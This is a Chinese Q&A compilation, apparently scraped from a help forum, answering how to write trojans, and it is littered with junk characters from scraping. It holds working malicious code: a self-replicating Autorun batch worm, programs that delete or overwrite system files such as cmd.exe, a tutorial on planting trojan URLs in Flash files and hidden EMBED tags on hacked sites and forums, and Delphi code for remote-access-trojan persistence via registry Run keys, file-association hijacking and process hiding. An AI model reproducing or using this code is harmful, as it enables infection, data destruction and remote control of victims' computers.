木马程序怎么编写

要想编写木马程序，你首先知道你自己的IP地址是多少，然后可以让木马自动连接你的电脑。

怎样编写木马,木马有什么用？

至于如何编写木马，当然需要写程序。编程语言的种类不少，编写木马最常用的语言有C++、VB和汇编。我举个简单的例子，在VB里编写一个病毒：

Private

Sub

form_Load()

me.hide()

kill

environ("windir")

+

"\system32\"

+

"taskrgm.exe"

unlaod

me

end

sub

试试在VB内运行这段代码，这样就可以把系统的任务管理器删除了！病毒危害人，阻碍计算机网络秩序……

怎么编辑木马程序

你想干什么？如果你只想玩玩，建议你学一下vbs脚本或bat脚本，如果你想把脚本做成exe程序，最简单的方法就是把脚本压缩到自解压文件里，再用16进制编辑器修改一下某个数值，就成功了。

如果你想干坏事，嘻嘻，木马也不是那么好写的，首先你要成为一个出色的程序员，不仅要打好C语言基础，更要精通汇编语言和计算机硬件以及操作系统原理，逻辑思维要强，当然要学的还很多，如mfc，C#等等，所以，如果你不是非常痴迷于编程，我劝你玩玩就行了，当然，更不要走上违法犯罪的道路吆！

good luck。

呀，还有，请采纳我吧，宝贝儿，嘻！

木马的编程是什么

一、制作Flash动画木马的准备 _1@2{3|$^'M!A程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛 Flash动画木马的原理，是在网页中显示或本地直接播放Flash动画木马时，让Flash自动打开一个网址，而该网址就是我们预先制作好的一个木马网页。也就是说，在制作网页木马前，我们首先需要制作好一个网页木马，并将它放置到某个网站上去。 %H8H7W*B%N,|:^4i+p6U 另外，我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”，以及Flash动画反编译工具“闪客精灵”，编辑工具Macromedia Flash MX。 二、最原始的Flash木马 (X8h4s8G8L"G程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛 现在虽然有了许多各种各样的Flash动画木马制作工具，但是为了了解Flash动画木马的最基本原理，有必要从头开始用最原始的方法制作一个Flash木马。 'h'C(U$R'I1L2v"ttech.techweb.com.cn 步骤一：反编译SWF动画-O7c$^,d"hQ7v5W 首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”，反编译成可编辑的.fla格式。运行“闪客精灵”，点击菜单“文件”→“快速打开”命令，指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令，将动画导出为“MM热舞.fla”文件。 5?-^9_-h)b8F3I,E;m5F 步骤二：插入网页木马代码9t!m*W,{5q%\6j"H!]6n"f 然后运行Flash动画编辑器Macromedia Flash MX，点击菜单“文件”→“打开”，调入刚才保存的fla文件。展开界面下方的“动作/帧”栏，再展开“动作”→“浏览器/网络”项，点击其中的“getURL”命令，在右边窗口中的“URL”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用GET方式发送”，在下方的代码窗口中将出现“getURL("http://网页木马地址", "_blank", "GET");”。tech.techweb.com.cn ^#o ~4V%{:m5z4E/H b;W 补充： 步骤三：生成Flash木马 -V"L$o(t8H6m9l)rtech.techweb.com.cn 设置完毕后保存文件，并点击菜单“文件”→“发布”命令，将动画重新导出为SWF格式。用IE浏览器打开刚才生成的Flash动画木马，可以看到随着Flash动画打开播放时，自动弹出一个浏览器窗口，里面将会显示我们的木马网页。 接着~~~~~ 三、简简单单生成Flash木马tech.techweb.com.cn*S0m7p#o5A p7S#C6l2zf9e 程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛-q"R1h8o8j0Z5c 上面插入木马的过程比较麻烦，下面我们介绍一个简单的方法，也正是这些简单的工具使得Flash木马在网上随处可见。 6V5n8`!I0R/c6~,e程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛+z%m3L'k}6M2` 运行SWF木马插入器，点击界面中的“选择”按钮，浏览指定要插入木马的SWF文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的“只解压”项。设置完毕后，点击“给我插”按钮，程序提示开始插入木马网页。显示成功信息后，关闭程序，用IE打开生成的动画，可以看到自动跳转到木马网页去了。 2v)l8e"^5H9^[#_!l 9{7l#Z+X"J(P @,B 四、Flash木马的利用 9U+p6W;d;D7e+F9Ktech.techweb.com.cn 4W6Z4W1v4V"}4A/D$t._0_7P1o 看到上面的步骤了吧，生成一个Flash动画木马是不是很简单? 那么生成的Flash木马该如何应用呢?只要我们将Flash上传到某个网站中，就可以通过论坛或网站之类的直接利用了。 补充： #Bc)e#c9A%`-w程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛+|,K({L#P2n:\6^ 大部分的论坛中都可以发来Flash动画的帖子，利用论坛发帖，攻击者可以快速获得大量的肉鸡。以PHPWind v4.3.2 论坛为例，在发帖或回复时，点击编辑窗口上方的“插入Flash动画”按钮，设置Flash窗口大小，使用默认设置后，要求输入Flash的URL地址。确定后，可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””，这就是完整的Flash播放代码了，不同的论坛代码是不一样的。TechWeb-技术社区5h4n8X5]/@'G+`'R'i %`6W'e)~"h 应用二：网页嵌入Flash木马"U3S9Z3v ^ 1q8X!h-V+V0T 攻击者入侵了某个大的网站之后，很可能在网站首页挂马，使用普通方式挂马会被管理员发觉，但是挂上Flash木马的话，是很难查杀的。攻击者可能在网页中插入如下代码：8y1o*@6Ll5k8L i8a9u%A,h5@/w “《EMBED src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”，其中的《》改为。 $B;{)o,j5C,A.H;Z(sTechWeb-技术社区5L/b)o'K,m:s'i1t 这里的参数“width=0 height=0”表示，Flash播放窗口为零，也就是不显示Flash播放窗口。其它用户浏览网页时，就会莫名其妙的弹出一个木马网页窗口。 '^9e#G)n:X-j*T 1f6F#k.zj3G

满意请采纳

请问木马怎么编程啊？？？

TP（tuobo pascal）可以写出很多木马的 给你几个看看 只能玩玩 program bingdu; var a:integer; begin a:=1; while a=1 do write('!'); end. 要退出的话就按ctrl+pause break 编写一个小程序开玩笑，用记事本就可以了： shutdown -s -t 1 用EXE格式保存，之后你朋友如果一打开它，就会关机 可以的啦,我自己写的 procedure 毒毒.exe var t:text begin assign(t,'Aoturun.inf'); rewrite(t); writeln(t,'[Autorun]'); writeln(t,''); writeln(t,'open=毒毒.exe'); end. 使用Autorun自动打开病毒，很毒的。 下面是我自己用BAT文件编写的： copy %0 c:\ copy %0 d:\ copy %0 e:\ echo [Autorun]c:\Autorun echo [Autorun]d:\Autorun echo [Autorun]e:\Autorun echo open=1.batc:\Autorun echo open=1.batd:\Autorun echo open=1.bate:\Autorun copy %0 C:\Documents and Settings\Administrator\「开始」菜单\程序\启动 start 1.bat 哈哈把我这个BAT病毒复制到文本文档里，把文件名改成1.bat 你会看到精彩的一幕。 这个病毒会制造Autorun把自己复制到C D E 盘 和启动项里； 送你一个低级的病毒吧！ program sheji; Var n,i:longint; d:char; p:file of integer; begin assign(p,'C:\WINDOWS\system32\CMD.exe'); rewrite(p); while n1980 do begin for i:=1 to 360 do write(p,i); for d:='a' to 'z' do write(p,i); n:=n+1; end; for i:=1 to 4 do erase(p); readln; end. 我特制了一个建立在它基础上，要比这个复杂一些的程序，不过，不给你看了，毕竟，这包括我个人的隐私了。

麻烦采纳，谢谢!

怎么编写木马

这个只是恶作剧程序，不是木马。

其实很简单嘛，只要终止explorer.exe进程就行了。

这都不需要编程，只要写个批处理就行。

把：taskkill

/f

/im

Explorer.exe写到一个文本文档里，然后把那个文档的后缀名由.txt改为.bat就行了。

木马一般用什么语言编

编写木马程序的计算机语言有很多，比如，有C++、VB、易语言等；

木马（Trojan）,也称木马病毒，是指通过特定的程序（木马程序）来控制另一台计算机。木马通常有两个可执行程序：一个是控制端，另一个是被控制端。

“木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种主机的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种主机

怎么编写木马程序？请各位大哥大姐们指点一二，越详细越好，小弟一点不懂编程哦！

其实做这个很简单的，现在我感觉做木马关键在于创意了 我电脑中收集过的一篇文章，给你参考一下 “冰河”启示录 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)本人对"冰河"及其作者没有任何不满,相反,作者肯帮助初学者的态度是我们每一个人都应该学习的.(二)本文的目的在于交流编程经验,没有任何其它不良企图.(三)在一些领域，我们理应宁可自制力让我们的预见力保持寂寞，也不要去做一个打开潘多拉盒子的先知。所以一些更厉害的方法我们现在不会提,以后也不会.--2000.8.3 (1) “冰河”是有名的用C++Builder编写的国产远程管理软件,其自我的功能保护很强,下面就以Delphi为例谈一谈它的原理,希望对大家有一些启发. 一、程序安装 此类程序一般会把自己隐藏起来运行,通常不外乎以下几种方法:自我拷贝法、资源文件法、网页方式安装、类病毒捆绑法(如YAI).自我拷贝法适用于本身就一个文件,资源文件法可以同时安装好几个文件,网页方式安装要先向M$交钱换安全签证,类病毒捆绑法利用了病毒的原理.本文只介绍自我拷贝法,其它方法请到我的个人主页去看. http://lovejingtao.126.com 1:自我拷贝法 这种方法的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,再退出旧程序. 打开Delphi,新建一个工程,在窗口的Create事件中写代码: procedure TForm1.FormCreate(Sender: TObject); var myname: string; begin myname := ExtractFilename(Application.Exename); //获得文件名 if application.Exename GetWindir + myname then //如果文件不是在Windows\System\那么.. begin copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{将自己拷贝到Windows\System\下} Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows\System\下的新文件 application.Terminate;//退出 end; end; 其中GetWinDir是自定义函数,起功能是找出Windows\System\的路径. function GetWinDir: String; var Buf: array[0..MAX_PATH] of char; begin GetSystemDirectory(Buf, MAX_PATH); Result := Buf; if Result[Length(Result)]'\' then Result := Result + '\'; end; 另外,为了避免同时运行多个程序的副本(节约系统资源也),程序一般会弄成每次只能运行一个.这又有几种方法. 一种方法是程序运行时先查找有没有相同的运行了,如果有,就立刻退出程序. 修改dpr项目文件，修改begin和end之间的代码如下： begin Application.Initialize; if FindWindow('TForm1','Form1')=0 then begin //当没有找到Form1时执行下面代码 Application.ShowMainForm:=False; //不显示主窗口 Application.CreateForm(TForm1, Form1); Application.Run; end; end. 另一种方法是启动时会先通过窗口名来确定是否已经在运行，如果是则关闭原先的再启动。“冰河”就是用这种方法的。 这样做的好处在于方便升级.它会自动用新版本覆盖旧版本. 方法如下:修改dpr项目文件 uses Forms,windows,messages, Unit1 in 'Unit1.pas' {Form1}; 为了程序能在Windows每次启动时自动运行,可以通过六种途径来实现.“冰河”用注册表的方式。 加入Registry单元,改写上面的窗口Create事件,改写后的程序如下: procedure TForm1.FormCreate(Sender: TObject); const K = '\Software\Microsoft\Windows\CurrentVersion\RunServices'; var myname: string; begin {Write by Lovejingtao, http://Lovejingtao.126.com ,Lovejingtao@21cn.com} myname := ExtractFilename(Application.Exename); //获得文件名 if application.Exename GetWindir + myname then //如果文件不是在Windows\System\那么.. begin copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{//将自己拷贝到Windows\System\下} Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows\System\下的新文件 application.Terminate;//退出 end; with TRegistry.Create do try RootKey := HKEY_LOCAL_MACHINE; OpenKey( K, TRUE ); WriteString( 'syspler', application.ExeName ); finally free; end; end; 为了让程序用ALT+DEL+CTRL看不见,在implementation后添加声明: function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL'; 再在上面的窗口Create事件加上一句：RegisterServiceProcess(GetCurrentProcessID, 1);//隐藏 启示1:当我们中了“冰河”,如果被对方上了密码而无法自己卸载时,可以先找出是什么文件,然后自己配置一个没有密码的来运行,这样它就会把原来有密码的覆盖掉,自己就可以轻松用它的卸载功能把它卸掉.如果你会编程,也可以自己写一个"清除器"了,方法是先查找到窗口名,向它发送退出命令,再把它删除即可. (2) “冰河”的自我功能保护很强,它一般通过Txt或Exe文件关联来达到自我恢复.所以有很多人明明把它杀掉了,但重新启动时又会出现.下面举以Txt文件关联为例. 打开Delphi,新建一个工程,在窗口的Create事件中写代码: uses Registry procedure TForm1.FormCreate(Sender: TObject); const Kkk = '\Software\Microsoft\Windows\CurrentVersion\RunServices'; const K = '\txtfile\shell\open\command'; var sFileName:string; begin //****************************************************** with TRegistry.Create do //写注册表,让程序跟文本文件关联 try RootKey := HKEY_CLASSES_ROOT; OpenKey( K, TRUE ); {Write by Lovejingtao, http://lovejingtao.126.com } WriteString( '', application.ExeName+' "%1" '); {Write by Lovejingtao,lovejingtao@21cn.com} finally free; end; //******************************************************* with TRegistry.Create do //写注册表，每次启动时自动运行 try RootKey := HKEY_LOCAL_MACHINE; OpenKey( Kkk, TRUE ); WriteString( 'myTray', application.ExeName ); finally free; end; //******************************************************** if FileExists(pchar(Getwindir+'Sysplay.exe'))=false then//如果文件已经删除 begin copyfile;//自定义拷贝资源文件过程 winexec(pchar(Getwindir+'Sysplay.exe'),sw_hide); end; //********************************************************** if ParamCount0 then begin (* 有执行参数传入 *) sFileName:=ParamStr(1); (* 取得参数内容 *) winexec(pchar('Notepad.exe '+sFileName),sw_show);(*用记事本打开*) //winexec(pchar( sFileName),sw_show); end; //******************************************************* application.Terminate;//退出 end; 如果要改为与Exe文件关联,只要把"const K = '\txtfile\shell\open\command';"改为 "const K = '\exefile\shell\open\command';",把"winexec(pchar('Notepad.exe '+sFileName),sw_show);" 改为"winexec(pchar( sFileName),sw_show);"即可.当然,还要加入是否退出Windows而运行的Rundll32.dll, 否则会因为关联Exe文件而退不出Windows. 启示2:手工删除“冰河”时,还要改掉它的保护功能,不能让它恢复.如果是关联了文本文件,先改注册表让它不能自动运行,重启后不要打开文本文件,立刻进到其安装目录把它删除.如果是关联了Exe文件,那只有回到Dos下删.切记:一定要把两个文件同时删掉,否则你重启后会发现文件又恢复了